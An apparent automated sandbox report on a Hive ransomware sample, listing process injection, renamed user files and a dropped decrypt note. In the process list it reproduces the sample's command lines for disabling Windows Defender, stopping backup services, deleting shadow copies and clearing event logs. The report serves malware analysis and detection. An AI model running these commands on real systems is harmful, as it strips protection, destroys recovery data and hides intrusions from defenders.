Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1620 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 528 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 528 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 528 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 528 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 816 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 816 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 816 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 816 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1216 wrote to memory of 1064 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1216 wrote to memory of 1064 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1216 wrote to memory of 1064 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1216 wrote to memory of 1064 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 912 wrote to memory of 748 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 912 wrote to memory of 748 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 912 wrote to memory of 748 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 912 wrote to memory of 748 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1440 wrote to memory of 1512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1440 wrote to memory of 1512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1440 wrote to memory of 1512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1440 wrote to memory of 1512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1528 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1528 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1528 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1528 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 844 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 844 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 844 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 844 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe

"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/528-54-0x0000000000000000-mapping.dmp

memory/704-55-0x0000000000000000-mapping.dmp

memory/564-56-0x0000000000000000-mapping.dmp

memory/1540-57-0x0000000000000000-mapping.dmp

memory/816-58-0x0000000000000000-mapping.dmp

memory/1988-59-0x0000000000000000-mapping.dmp

memory/1216-60-0x0000000000000000-mapping.dmp

memory/1064-61-0x0000000000000000-mapping.dmp

memory/912-62-0x0000000000000000-mapping.dmp

memory/748-63-0x0000000000000000-mapping.dmp

memory/1440-64-0x0000000000000000-mapping.dmp

memory/1512-65-0x0000000000000000-mapping.dmp

memory/1528-66-0x0000000000000000-mapping.dmp

memory/1304-67-0x0000000000000000-mapping.dmp

memory/844-68-0x0000000000000000-mapping.dmp

memory/1520-69-0x0000000000000000-mapping.dmp

memory/1736-70-0x0000000000000000-mapping.dmp

memory/1168-71-0x0000000000000000-mapping.dmp

memory/1748-72-0x0000000000000000-mapping.dmp

memory/1352-73-0x0000000000000000-mapping.dmp

memory/1500-74-0x0000000000000000-mapping.dmp

memory/1704-75-0x0000000000000000-mapping.dmp

memory/1700-76-0x0000000000000000-mapping.dmp

memory/756-77-0x0000000000000000-mapping.dmp

memory/1232-78-0x0000000000000000-mapping.dmp

memory/1940-79-0x0000000000000000-mapping.dmp

memory/520-80-0x0000000000000000-mapping.dmp

memory/1944-81-0x0000000000000000-mapping.dmp

memory/748-82-0x0000000000000000-mapping.dmp

memory/660-83-0x0000000000000000-mapping.dmp

memory/1140-84-0x0000000000000000-mapping.dmp

memory/1664-85-0x0000000000000000-mapping.dmp

memory/1120-86-0x0000000000000000-mapping.dmp

memory/1456-87-0x0000000000000000-mapping.dmp

memory/1840-88-0x0000000000000000-mapping.dmp

memory/1492-89-0x0000000000000000-mapping.dmp

memory/1864-90-0x0000000000000000-mapping.dmp

memory/1340-91-0x0000000000000000-mapping.dmp

memory/1212-92-0x0000000000000000-mapping.dmp

memory/576-93-0x0000000000000000-mapping.dmp

memory/1148-94-0x0000000000000000-mapping.dmp

memory/824-95-0x0000000000000000-mapping.dmp

memory/1172-96-0x0000000000000000-mapping.dmp

memory/1520-97-0x0000000000000000-mapping.dmp

memory/1896-98-0x0000000000000000-mapping.dmp

memory/1652-99-0x0000000000000000-mapping.dmp

memory/1600-100-0x0000000000000000-mapping.dmp

memory/476-101-0x0000000000000000-mapping.dmp

memory/1988-102-0x0000000000000000-mapping.dmp

memory/1768-103-0x0000000000000000-mapping.dmp

memory/1056-104-0x0000000000000000-mapping.dmp

memory/1996-105-0x0000000000000000-mapping.dmp

memory/1908-106-0x0000000000000000-mapping.dmp

memory/1300-107-0x0000000000000000-mapping.dmp

memory/704-108-0x0000000000000000-mapping.dmp

memory/972-109-0x0000000000000000-mapping.dmp

memory/1108-110-0x0000000000000000-mapping.dmp

memory/1924-111-0x0000000000000000-mapping.dmp

memory/1540-112-0x0000000000000000-mapping.dmp

memory/1888-113-0x0000000000000000-mapping.dmp

memory/1384-114-0x0000000000000000-mapping.dmp

memory/1468-115-0x0000000000000000-mapping.dmp

memory/992-116-0x0000000000000000-mapping.dmp

memory/2084-117-0x0000000000000000-mapping.dmp

memory/2140-118-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

memory/2140-119-0x0000000002420000-0x0000000002421000-memory.dmp

memory/2140-120-0x0000000002421000-0x0000000002422000-memory.dmp

memory/2140-121-0x0000000002422000-0x0000000002424000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d73cb42dee1426dc868f355bf4e56362
SHA1 cb49cd833729049646ea1f7d47cdbcde302cf107
SHA256 ac3839aa72501764cc688345b0e4a2924f80a324280fef5f8eaa8a9db81b0b81
SHA512 d4dec8c95ae1265f91a2885aa9ef46458c26583bf261111f2d8569d3f4243b0e734da0a2bb0933f59c361e30b0af9931717b4d3a3176d583561b316ff186666c

memory/2220-124-0x00000000022D0000-0x0000000002F1A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 14:14

Reported

2022-01-13 14:19

Platform

win10-en-20211208

Max time kernel

288s

Max time network

179s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\ConvertToLock.tif => C:\Users\Admin\Pictures\ConvertToLock.tif.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_c42iGssX7900.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\ConvertToLock.tif.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_c42iGssX7900.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File renamed C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_TwRkFi3RdEA0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\SyncExport.tiff.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_JRHBmUgIVEc0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File renamed C:\Users\Admin\Pictures\UpdateDismount.raw => C:\Users\Admin\Pictures\UpdateDismount.raw.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_goKKq6AwGLU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\FormatSplit.crw.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_TwRkFi3RdEA0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File renamed C:\Users\Admin\Pictures\ReceiveSkip.png => C:\Users\Admin\Pictures\ReceiveSkip.png.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_OTAloexLCdo0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\ReceiveSkip.png.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_OTAloexLCdo0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File renamed C:\Users\Admin\Pictures\SyncExport.tiff => C:\Users\Admin\Pictures\SyncExport.tiff.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_JRHBmUgIVEc0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\UpdateDismount.raw.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_goKKq6AwGLU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Internet Explorer\en-US\iexplore.exe.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_xPwlAq0jtq80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Retail\Retail_Get_Started_icon.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
